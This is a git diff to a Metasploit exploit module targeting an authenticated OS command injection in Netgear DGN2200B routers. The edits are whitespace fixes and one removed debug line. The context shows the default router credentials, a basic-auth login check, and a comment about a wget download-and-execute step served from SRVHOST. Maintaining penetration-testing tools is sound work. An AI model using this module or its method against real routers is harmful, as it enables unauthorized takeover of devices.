diff --git a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb index 6123faa2bc..594c0d3afe 100644 --- a/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb +++ b/modules/exploits/linux/http/netgear_dgn2200b_pppoe_exec.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Netgear DGN2200B Command Execution - Upload and Execute', 'Description' => %q{ Some Netgear Routers are vulnerable to an authenticated OS command injection. - Default credentials for the web interface are admin/admin or admin/password. + Default credentials for the web interface are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. @@ -140,7 +140,6 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', 'authorization' => basic_auth(user,pass) }) - puts res.code if res.nil? or res.code == 404 fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end @@ -185,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote datastore['SSL'] = false end - #we use SRVHOST as download IP for the coming wget command. + #we use SRVHOST as download IP for the coming wget command. #SRVHOST needs a real IP address of our download host if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = Rex::Socket.source_address(rhost)